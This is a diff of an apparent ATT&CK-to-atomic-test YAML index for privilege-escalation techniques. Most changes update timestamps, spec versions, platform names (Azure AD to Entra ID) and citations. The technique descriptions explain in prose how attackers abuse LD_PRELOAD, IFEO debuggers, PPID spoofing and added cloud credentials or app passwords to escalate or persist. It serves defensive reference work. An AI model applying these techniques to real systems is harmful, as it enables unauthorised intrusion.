       - 'User Account: User Account Authentication'
@@ -18309,9 +18636,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18383,7 +18707,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18410,7 +18733,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18436,13 +18759,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18563,12 +18884,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18600,11 +18920,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18645,11 +18964,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18705,12 +19023,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18767,7 +19084,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18837,7 +19153,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18947,7 +19262,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -19001,7 +19315,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -19034,13 +19348,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -19102,10 +19414,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -19163,7 +19474,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -19205,7 +19515,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -19264,8 +19574,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -19295,7 +19603,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19330,12 +19638,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19412,7 +19718,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19451,7 +19756,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19500,8 +19805,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19533,7 +19836,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19581,13 +19884,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19600,16 +19901,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19621,16 +19922,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19685,7 +19986,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19708,7 +20008,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19752,8 +20052,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19830,7 +20128,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19858,8 +20156,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19918,23 +20214,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19944,11 +20239,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19959,12 +20258,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19973,6 +20279,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19981,13 +20288,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -20013,10 +20323,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -20025,10 +20343,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -20045,9 +20373,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests:
     - name: AWS - Create Access Key and Secret Key
@@ -20145,7 +20470,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -20234,7 +20558,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -20292,7 +20615,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -20317,12 +20640,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -20348,7 +20670,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -20362,7 +20683,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20389,8 +20709,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -20401,7 +20721,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20472,7 +20793,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20499,7 +20820,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20539,7 +20859,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20559,12 +20879,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20618,11 +20937,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
